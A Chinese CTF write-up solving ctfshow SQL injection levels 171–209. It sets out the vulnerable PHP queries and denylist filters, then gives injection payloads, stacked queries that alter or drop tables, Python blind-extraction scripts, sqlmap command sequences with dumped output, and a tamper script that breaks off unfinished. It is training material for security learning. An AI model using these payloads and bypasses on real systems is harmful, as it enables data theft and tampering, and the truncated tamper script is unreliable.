SQL注入_CTF Show

171

要点:使用 or true 绕过 where 后的条件约束(MySQL中非零数字可代表true)

$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
0' or true%23
0' or '1

需要自己把#编码为%23

172

$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//返回逻辑:检查结果是否有flag
    if($row->username!=='flag'){
      $ret['msg']='查询成功';
    }
0' union select 1,group_concat(password)from ctfshow_user2 where username="flag"%23

173

要点:编码绕过返回内容过滤 hex() to_base64()

$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//返回逻辑:检查结果是否有flag
	if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
1' union select 1,2,hex(group_concat(password))from ctfshow_user3 where username="flag"%23

174

要点:编码 替换

$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//返回逻辑:检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
to_base64()编码后,用replace()将数字替换为字母
replace(object,search,replace)

175

要点:将查询结果写入文档然后访问

$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//返回逻辑:检查结果是否有flag
    if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
1' union select 1,password from ctfshow_user5 into outfile "/var/www/html/1.txt"%23
#然后访问url/1.txt

176

$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";

//对传入的参数进行了过滤
  // Filter applied to the id parameter before it is concatenated into $sql above.
  function waf($str){
   // body omitted by the challenge author ("too simple to show")
  }
#union、select绕过,详见 MySQL绕过.md

177~179

同上
过滤空格

180

同上
#过滤了注释符和空格
0'||username='flag

181

要点:and or

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";

//对传入的参数进行了过滤
  // Denylist for the id parameter: non-zero (blocked) when it contains a space,
  // '*', \x09-\x0d, \x00, \xa0, '#' (also as \x23) or the words file / into /
  // select, case-insensitive.  Blocking keywords leaves the string-concatenated
  // $sql above untouched, so anything the pattern does not name still reaches
  // MySQL.
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
  }
      
#注意 limit 1:需要前面的 id='' 查不到内容,再由后面的 username='flag' 得到想要的数据;and'1 用于闭合单引号(不能用 or '1,否则会从所有数据中返回第一条)
'or(username='flag')and'1
'||(username)='flag

182

要点:模糊查询(like regexp)

select * from tb1 where name regexp'a';
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";

//对传入的参数进行了过滤
  // Same denylist as the previous level plus the word "flag".  Because the
  // match is a substring match, the filter does not prevent a LIKE/REGEXP
  // comparison against the column that holds the value.
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
  }
0'||(id)='26

'||(password)regexp'{		#正则匹配{
'||(password)like'%{%	

183

要点:盲注,使用like或者regexp

//拼接sql语句查找指定ID用户
  $sql = "select count(pass) from ".$_POST['tableName'].";";

//对传入的参数进行了过滤
  // Denylist for $_POST['tableName']: whitespace, '*', '#', '=', '|' (\x7c) and
  // the words file / or / select / and / flag / into, case-insensitive.  Note
  // that "or" and "and" are matched as substrings, so legitimate identifiers
  // containing them (e.g. "password", "information_schema") are rejected too —
  // a common side effect of keyword denylists on a concatenated query.
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into/i', $str);
  }
import requests

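url='http://aefd8cad-6684-46a7-89d3-daeb81f816af.challenge.ctf.show/select-waf.php'

flag="ctfshow{"
# One character per round: every candidate is tried as the next character of
# the known prefix, and the server's "$user_count = 1" output is the oracle.
# LIKE compares under the column collation, so with a case-insensitive
# collation upper-case characters are recovered in lower case.
for rnd in range(100):
    for j in "{0123456789abcdefghijklmnopqrstuvwxyz-}":
        data = {
            'tableName': f"(ctfshow_user)where(pass)like'{flag + j}%'"
        }
        r = requests.post(url=url, data=data).text
        if "$user_count = 1" in r:
            flag += j
            print(flag)
            if j == '}':
                raise SystemExit()
            break
    else:
        # No candidate matched: the next character is outside the alphabet,
        # so repeating the same round (the original did, up to 100 times)
        # cannot make progress.
        break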

184

#原理 使用join绕过对where的过滤
select * from tb1 as a join tb1 as b on (b.title regexp concat(char(97),char(97)));
//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
  
  //对传入的参数进行了过滤
  // Denylist for $_POST['tableName'] (spaces are NOT on the list any more):
  // '*', control characters, '#', '=', '|', '&', quotes, backtick and the words
  // file / or / select / and / flag / into / where / union / sleep / benchmark.
  // Note `\0x0d` (not `\x0d`) in the pattern: as written it appears to match
  // NUL followed by the literal text "x0d", so a carriage return is not blocked.
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }
import requests

# Candidate alphabet, tried in this order for every position.
dic = '{0123456789abcdefghijklmnopqrstuvwxyz-}'
# Known prefix; extended by one character per successful round.
flag = 'ctfshow{'
# Challenge endpoint (instance-specific host).
url = 'http://9868e30a-0e18-44f9-ae7c-31598a569b9a.challenge.ctf.show/select-waf.php'

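def switchToChar(str):
    """Render *str* as a MySQL ``concat(char(..),char(..),...)`` expression.

    Each character becomes ``char(<code point>)``, which lets the text be
    expressed without quote characters.

    Args:
        str: text to encode.  The parameter name shadows the builtin; it is
            kept for call compatibility and only ever used as the argument.
    Returns:
        The SQL expression as a string.  An empty input yields ``'concat()'``
        (the original returned an unbalanced ``'concat('``).
    """
    codes = ','.join(f'char({ord(ch)})' for ch in str)
    return f'concat({codes})'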

def getPayload(c):
    """Build the POST body for one guess.

    The known prefix ``flag`` (module global) plus candidate *c* is rendered
    with ``switchToChar`` and placed in the join condition of the tableName
    value.

    Args:
        c: the single candidate character to test.
    Returns:
        A dict with the one form field the endpoint reads.
    """
    expr = switchToChar(flag + c)
    return {
        'tableName': f'ctfshow_user as a join ctfshow_user as b on (b.pass regexp {expr})'
    }

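# One character per round.  A self-join whose ON condition is the prefix
# guess yields zero rows ("$user_count = 0;") on a miss; any other output is
# read as a hit.
for rnd in range(50):
    print(f'第{rnd}轮')
    for c in dic:
        rep = requests.post(url, getPayload(c))
        if '$user_count = 0;' in rep.text:
            continue
        flag += c
        print(flag)
        if c == '}':
            raise SystemExit(123)
        break
    else:
        # No candidate matched: the next character is outside `dic`, so
        # repeating the same round cannot make progress.
        break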

185-186

要点:通过弱类型或者产生数字的函数绕过对数字的过滤

false	0
true	1
pi()	3.14……
ceil()
floor()
version()	甚至可以用上version……
count()		甚至count……	select * from tb1 where id=(select count(id) from tb1);
mysql> select * from tb1 where id=true+true;
+----+------+------+-------+
| id | name | age  | score |
+----+------+------+-------+
|  2 | wsx  | NULL |  NULL |
+----+------+------+-------+

mysql> select * from tb1 where id=floor(pi());
+----+------+------+-------+
| id | name | age  | score |
+----+------+------+-------+
|  3 | edc  | NULL |  NULL |
+----+------+------+-------+

mysql> select * from tb1 where id=(select count(id) from tb1);
+----+------+------+-------+
| id | name | age  | score |
+----+------+------+-------+
|  7 | ujm  | NULL |  NULL |
+----+------+------+-------+
//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
  
  //对传入的参数进行了过滤
  // Same denylist as the previous level plus every digit ([0-9]) and the
  // characters '%', '<', '>', '^'.  Digits are blocked, but expressions that
  // evaluate to numbers (true, pi(), count(), ...) are not — see the notes
  // above; the query is still built by concatenation.
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\%|\<|\>|\^|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }

当然这里使用 true 会更方便
修修补补又一个脚本

import requests

# Candidate alphabet, tried in this order for every position.
dic = '{0123456789abcdefghijklmnopqrstuvwxyz-}'
# Known prefix; extended by one character per successful round.
flag = 'ctfshow{'
# Challenge endpoint (instance-specific host).
url = 'http://a1377eef-3929-4768-bbc6-ea6daad79005.challenge.ctf.show/select-waf.php'

def switchToTrue(num):
    """Spell the integer *num* as ``true+true+...`` with *num* terms.

    MySQL evaluates ``true`` as 1, so the expression equals *num* without
    containing a digit.  ``num <= 0`` gives an empty string.

    Args:
        num: number of ``true`` terms.
    Returns:
        The '+'-joined expression.
    """
    return '+'.join(['true'] * num)

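def switchToChar(str):
    """Render *str* as ``concat(char(..),...)`` with digit-free code points.

    Each character becomes ``char(<code point>)`` where the code point is
    written via ``switchToTrue`` (a sum of ``true`` terms), so the result
    contains neither quotes nor digits.

    Args:
        str: text to encode.  The parameter name shadows the builtin; it is
            kept for call compatibility and only ever used as the argument.
    Returns:
        The SQL expression as a string.  An empty input yields ``'concat()'``
        (the original returned an unbalanced ``'concat('``).
    """
    codes = ','.join(f'char({switchToTrue(ord(ch))})' for ch in str)
    return f'concat({codes})'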

def getPayload(c):
    """Build the POST body for one guess.

    The known prefix ``flag`` (module global) plus candidate *c* is rendered
    with ``switchToChar`` and placed in the join condition of the tableName
    value.

    Args:
        c: the single candidate character to test.
    Returns:
        A dict with the one form field the endpoint reads.
    """
    expr = switchToChar(flag + c)
    return {
        'tableName': f'ctfshow_user as a join ctfshow_user as b on (b.pass regexp {expr})'
    }


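# One character per round.  A self-join whose ON condition is the prefix
# guess yields zero rows ("$user_count = 0;") on a miss; any other output is
# read as a hit.
for rnd in range(50):
    print(f'第{rnd}轮')
    for c in dic:
        rep = requests.post(url, getPayload(c))
        if '$user_count = 0;' in rep.text:
            continue
        flag += c
        print(flag)
        if c == '}':
            raise SystemExit(123)
        break
    else:
        # No candidate matched: the next character is outside `dic`, so
        # repeating the same round cannot make progress.
        break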

187

要点:用特定字符串绕过md5(),实现永真

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ctfshow_user where username = '$username' and password= '$password'";
  
  $username = $_POST['username'];
    $password = md5($_POST['password'],true);

    //只有admin可以获得flag
    if($username!='admin'){
        $ret['msg']='用户名不存在';
        die(json_encode($ret));
    }
username=admin
password=ffifdyop	或
md5('ffifdyop',true)	#原始输出以 'or'6 开头,其余为不可打印字节;拼入 SQL 后形成永真条件

188

要点:弱类型比较

 //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username}";

 //用户名检测
  if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //密码判断
  if($row['pass']==intval($password)){
      $ret['msg']='登陆成功';
      array_push($ret['data'], array('flag'=>$flag));
    }

在 where username=0 这样的查询中,username 是字符串;MySQL 比较字符串与数字时会把字符串转为数字,以字母开头的字符串转换结果为 0,因此这个 where 会把所有以字母开头的记录查出来。

mysql> select * from tb1 where name=0;
+----+------+------+-------+
| id | name | age  | score |
+----+------+------+-------+
|  1 | qaz  | NULL |  NULL |
|  2 | wsx  | NULL |  NULL |
|  3 | edc  | NULL |  NULL |
|  4 | rfv  | NULL |  NULL |
|  5 | tgb  | NULL |  NULL |
|  6 | yhn  | NULL |  NULL |
|  7 | ujm  | NULL |  NULL |
if($row['pass']==intval($password))
#弱类型比较,'a123'==0	注:低版本PHP中结果为true,高版本中为false
#故payload为 0 0

布尔盲注

189

 //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username}";
  
   //用户名检测
  if(preg_match('/select|and| |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\x26|\x7c|or|into|from|where|join|sleep|benchmark/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }

输入 0 0, 提示密码错误;输入1 0, 提示查询失败

根据这两个反馈结果,用盲注来获取文件内容

MySQL 中的 if(条件,1,2) 相当于三元运算 条件 ? 1 : 2

mysql> select if(0,1,2);
+-----------+
| if(0,1,2) |
+-----------+
|         2 |
+-----------+

mysql> select if(1,1,2);
+-----------+
| if(1,1,2) |
+-----------+
|         1 |
+-----------+

payload: username=if((load_file('/var/www/html/api/index.php'))regexp('ctfshow{'),0,1)&password=2
字符串匹配成功,username=0,返回\u5bc6\u7801\u9519\u8bef(密码错误);
不成功,username=1,返回\u67e5\u8be2\u5931\u8d25(查询失败)

import requests

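url = 'http://89988101-8578-48d2-8852-ef798b54c4af.challenge.ctf.show/api/'
dic = '{0123456789abcdefghijklmnopqrstuvwxyz-}'
flag = 'ctfshow{'

# The username expression evaluates to 0 when the file content matches the
# guessed prefix and to 1 otherwise; with password=0 the two cases produce
# different server messages (JSON-escaped '密码错误' vs '查询失败'), which is
# the oracle.  Anything else is treated as a broken session and stops the run.
for rnd in range(50):
    print(f'第{rnd}轮')
    for c in dic:
        payload = f"if((load_file('/var/www/html/api/index.php'))regexp('{flag+c}'),0,1)"
        data = {
            'username': payload,
            'password': '0'
        }
        rep = requests.post(url=url, data=data)
        if '\\u5bc6\\u7801\\u9519\\u8bef' in rep.text:
            flag += c
            print(flag)
            if c == '}':
                raise SystemExit(0)
            break
        if '\\u67e5\\u8be2\\u5931\\u8d25' in rep.text:
            continue  # not this character
        print('sth wrong')
        print(rep.text)
        raise SystemExit(-1)
    else:
        # No candidate matched: the next character is outside `dic`, so
        # repeating the same round cannot make progress.
        break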

190

//查询语句
  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";

//返回逻辑

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }

  //TODO:感觉少了个啥,奇怪
// 布尔盲注
import requests
url = 'http://4ba95929-1697-41b3-aeb5-dbc9414219c4.challenge.ctf.show/api/'
data = {'username': '', 'password': 1}
flag = ''

# Earlier rounds run with the same loop (kept for reference):
#   select group_concat(table_name) from information_schema.tables where table_schema=database()
#   select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'
payload = 'select concat(f1ag) from ctfshow_fl0g'

for pos in range(1, 46):
    # Binary search over ASCII 32..127 for the character at `pos`.  The server
    # message is the oracle: '密码错误' means the condition was true (code
    # above mid), anything else means it was false.
    lo, hi = 32, 127
    while lo < hi:
        mid = (lo + hi) // 2
        data['username'] = f"admin' and if(ascii(substr(({payload}),{pos},1))>{mid},1,2)=1#"
        res = requests.post(url, data=data)
        if '密码错误' in res.json()['msg']:
            lo = mid + 1
        else:
            hi = mid
    flag += chr(lo)
    print(flag)

191

#相比上题过滤了ascii(),使用ord()代替
import requests
 
url = 'http://7abd7b71-5043-4600-a76b-1158125793db.challenge.ctf.show/api/'
data = {'username': '', 'password': 1}
flag = ''

# Earlier rounds run with the same loop (kept for reference):
#   select group_concat(table_name) from information_schema.tables where table_schema=database()
#   select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'
payload = 'select concat(f1ag) from ctfshow_fl0g'

for pos in range(1, 46):
    # Same binary search as the previous level, with ord() in place of the
    # now-filtered ascii().  '密码错误' means the condition was true (code
    # above mid), anything else means it was false.
    lo, hi = 32, 127
    while lo < hi:
        mid = (lo + hi) // 2
        data['username'] = f"admin' and if(ord(substr(({payload}),{pos},1))>{mid},1,2)=1#"
        res = requests.post(url, data=data)
        if '密码错误' in res.json()['msg']:
            lo = mid + 1
        else:
            hi = mid
    flag += chr(lo)
    print(flag)

192


//查询语句
  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";
      

//返回逻辑

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥,奇怪
    if(preg_match('/file|into|ascii|ord|hex/i', $username)){
        $ret['msg']='用户名非法';
        die(json_encode($ret));
    }
#过滤增加了ord和hex。那么可以使用正则表达式来判断
import requests
 
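url = 'http://6dc4f652-352a-4f34-b25b-fb95e0b691ba.challenge.ctf.show/api/'
data = {'username': '', 'password': 1}
flag = ''

# Earlier rounds run with the same loop (kept for reference):
#   select group_concat(table_name) from information_schema.tables where table_schema=database()
#   select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'
payload = 'select concat(f1ag) from ctfshow_fl0g'

# NOTE(review): '{', '}' and '-' are regex metacharacters; whether a lone one
# is taken literally depends on the server's regex engine — confirm before
# relying on those three candidates.
for pos in range(1, 46):
    for j in r'1234567890qazwsxedcrfvtgbyhnujmikolp-{}':
        data['username'] = f"admin' and if(substr(({payload}),{pos},1)regexp('{j}'),1,2)=1#"
        res = requests.post(url, data=data)
        if '密码错误' in res.json()['msg']:
            flag = flag + j
            print(flag)
            # One character per position.  The original kept probing the rest
            # of the alphabet for the same slot, wasting requests and risking
            # a second append if another candidate also matched.
            break
    if flag.endswith('}'):
        break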

193~194

//193
if(preg_match('/file|into|ascii|ord|hex|substr/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
}
//194
if(preg_match('/file|into|ascii|ord|hex|substr|char|left|right|substring/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
}
# substr 也给过滤了,用like去匹配
import requests
 
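url = 'http://66fc1124-328e-4cf0-8493-8cc13b8f7eb0.challenge.ctf.show/api/'
data = {'username': '', 'password': 1}
flag = ''

# Earlier rounds run with the same loop (kept for reference):
#   select group_concat(table_name) from information_schema.tables where table_schema=database()
#   select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'
payload = 'select concat(f1ag) from ctfshow_flxg'

# Alphabet note: '_' is last on purpose — in LIKE it is a single-character
# wildcard, so it only "matches" when no literal candidate did and then stands
# in for an unknown character.  LIKE is also case-insensitive under a
# case-insensitive collation, so upper-case letters come back lower-cased.
for pos in range(len(flag) + 1, 46):
    for j in r'flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz},_':
        data['username'] = f"admin' and if(({payload}) like '{flag + j + '%'}',1,0)#"
        res = requests.post(url, data=data)
        if '密码错误' in res.json()['msg']:
            flag = flag + j
            print(flag)
            break
    else:
        # Nothing matched (not even the '_' wildcard): the value has ended.
        break
    if j == '}':
        # Closing brace reached; the original kept sending requests up to
        # position 45 with no way to match anything.
        break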

195

if(preg_match('/|\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username)){
	$ret['msg']='用户名非法';
	die(json_encode($ret));
}
//这道题用的是堆叠注入:将多条语句堆叠在一起执行,用分号闭合之前的语句,再写入一条新的语句。这里将表中所有密码修改为 1,然后登录获得 flag。
0;update`ctfshow_user`set`pass`=1

196

// 写着过滤了select,实际上没有,所以说到底过滤了什么还得靠自己fuzz
0;select(1)
0

197

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";

//update 被 ban 了。
if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set//i', $username)){
	$ret['msg']='用户名非法';
	die(json_encode($ret));
}
if($row[0]==$password){
	$ret['msg']="登陆成功 flag is $flag";
}
1.使用alter指令可以修改字段 id 为 pass,修改 pass 为 id ,这样登录时查询到的就是原来的id了,然后爆破id就可以了
2.drop 和 create 重新建立表,使账号密码为自己设置的
3.或者直接 0;insert ctfshow_user(`username`,`pass`) value(1,2); 就能直接用1 2登录了
4.update数据

198

 //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  
 //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }
1.使用alter指令可以修改字段 id 为 pass,修改 pass 为 id ,这样登录时查询到的就是原来的id了,然后爆破id就可以了
2.或者直接 0;insert ctfshow_user(`username`,`pass`) value(1,2); 就能直接用1 2登录了

199

//拼接sql语句查找指定ID用户
$sql = "select pass from ctfshow_user where username = {$username};";

//TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop|\(/i', $username)){
	$ret['msg']='用户名非法';
	die(json_encode($ret));
}

if($row[0]==$password){
	$ret['msg']="登陆成功 flag is $flag";
}
// 过滤了(
1;show tables
ctfshow_user

200

//拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};"; 

//TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop|\(|\,/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }
1;show tables
ctfshow_user

SQLMap

201

--random-agent		#随机UA,默认UA为sqlmap
--referer=REFERER	#指定 HTTP Referer

#初步测试
sqlmap -u "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/api/?id=1&page=1&limit=10" -p "id" --referer "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/sqlmap.php" 

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5896=5896 AND 'gQrI'='gQrI&page=1&limit=10

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 3963 FROM (SELECT(SLEEP(5)))dayT) AND 'DnNy'='DnNy&page=1&limit=10

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767071,0x4b5576494253544f6e6e414475684d7946437643544946634d77536943415758694b524676595479,0x7170767171)-- -&page=1&limit=10

#库名
sqlmap -u "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/api/?id=1&page=1&limit=10" -p "id" --referer "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/sqlmap.php" -dbs

available databases [5]:
[*] ctfshow_web
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

#当前数据库
sqlmap -u "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/api/?id=1&page=1&limit=10" -p "id" --referer "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/sqlmap.php" --current-db

current database: 'ctfshow_web'

#表名
sqlmap -u "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/api/?id=1&page=1&limit=10" -p "id" --referer "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/sqlmap.php" --tables -D 'ctfshow_web'

Database: ctfshow_web
[1 table]
+--------------+
| ctfshow_user |
+--------------+

#列名
sqlmap -u "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/api/?id=1&page=1&limit=10" -p "id" --referer "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/sqlmap.php" --columns -D 'ctfshow_web' -T ctfshow_user

Database: ctfshow_web
Table: ctfshow_user
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(11)      |
| pass     | varchar(255) |
| username | varchar(255) |
+----------+--------------+

#数据
sqlmap -u "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/api/?id=1&page=1&limit=10" -p "id" --referer "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/sqlmap.php" --dump -D 'ctfshow_web' -T ctfshow_user -C 'pass'

202

--data=DATA        # 使用 POST 发送数据串(例如:"id=1")

# 初步测试
sqlmap -u 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/api/' --referer 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/sqlmap.php' --data 'id=1' -p 'id'

# 库名
sqlmap -u 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/api/' --referer 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/sqlmap.php' --data 'id=1' -p 'id' --dbs

sqlmap -u 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/api/' --referer 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/sqlmap.php' --data 'id=1' -p 'id' --current-db

sqlmap -u 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/api/' --referer 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/sqlmap.php' --data 'id=1' -p 'id' -D 'ctfshow_web' --tables

sqlmap -u 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/api/' --referer 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/sqlmap.php' --data 'id=1' -p 'id' -D 'ctfshow_web' -T 'ctfshow_user' --columns

sqlmap -u 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/api/' --referer 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/sqlmap.php' --data 'id=1' -p 'id' -D 'ctfshow_web' -T 'ctfshow_user' -C 'pass' --dump

203

--method=METHOD     #强制使用提供的 HTTP 方法(如:--method=PUT)
sqlmap -u "http://a9c57809-71f8-47e3-8b55-cb67fc5344e1.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --dump 

204

--cookie=COOKIE     #指定 HTTP Cookie(例如:"PHPSESSID=a8d127e..")
sqlmap -u 'http://d1d592d5-bd25-4cc8-a0c6-9935b9d2d955.challenge.ctf.show/api/index.php' --data="id=1" --referer=ctf.show --header="Content-Type:text/plain" --method=PUT  --cookie="PHPSESSID=8hco6t24a7b36iq3duuc8pgp3n; ctfshow=1534616240fbf803e61d298e9e761df3" --dump

205~206

--safe-url=SAFEURL  设置在测试目标地址前访问的安全链接(下面的命令使用的即此选项)
--safe-freq=SAFE..  每次注入前访问安全链接的次数

sqlmap -u 'http://84bad191-a27c-41b0-965d-22eacc74f655.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://84bad191-a27c-41b0-965d-22eacc74f655.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain'

207

# 使用 tamper 脚本(space2comment)绕过对空格的拦截
sqlmap -u 'http://41151a5d-59ae-4eac-8bf1-aa61d9a87b9f.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://41151a5d-59ae-4eac-8bf1-aa61d9a87b9f.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper space2comment -v 3 --dump

208

# 绕过对 select 和 空格的过滤
sqlmap -u 'http://a2b707ac-3ac4-461c-9e5d-b79589ee27b0.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://a2b707ac-3ac4-461c-9e5d-b79589ee27b0.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper 'space2comment' -v 3 --batch --technique=B --dump

209

# 过滤了 空格 * =
sqlmap -u 'http://cbebf0b9-6373-4e62-a92b-3f88c6b89ba8.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://cbebf0b9-6373-4e62-a92b-3f88c6b89ba8.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper '209.py' -v 3 --batch
# 209.py	基于space2comment.py修改
#!/usr/bin/env python
from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW  # NOTE(review): sqlmap tamper ordering; LOW presumably runs after higher-priority tampers — confirm in lib.core.enums

def dependencies():
    """Declare no external requirements (sqlmap tamper-script hook)."""
    return None

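def tamper(payload, **kwargs):
    """Rewrite a sqlmap payload so it contains no spaces and no '=' signs.

    Processing is left to right and has two phases:
      * up to the first whitespace character of any kind, everything is copied
        verbatim (quotes and '=' included); that character becomes LF (0x0a);
      * after it, a plain space outside single/double quotes becomes LF, and
        every '=' becomes LF + 'like' + LF.
    Everything else is copied through.  A falsy payload (None, '') is
    returned unchanged.

    Args:
        payload: the SQL fragment sqlmap is about to send.
        **kwargs: ignored; present for the tamper-script interface.
    Returns:
        The rewritten payload.

    NOTE(review): in the second phase '=' is rewritten even inside quoted
    literals, unlike the space rule — confirm that is intended.
    """
    if not payload:
        return payload

    out = []
    in_single = in_double = False
    seen_space = False
    for ch in payload:
        if not seen_space:
            if ch.isspace():
                seen_space = True
                out.append("\n")
                continue
        elif ch == "'":
            in_single = not in_single
        elif ch == '"':
            in_double = not in_double
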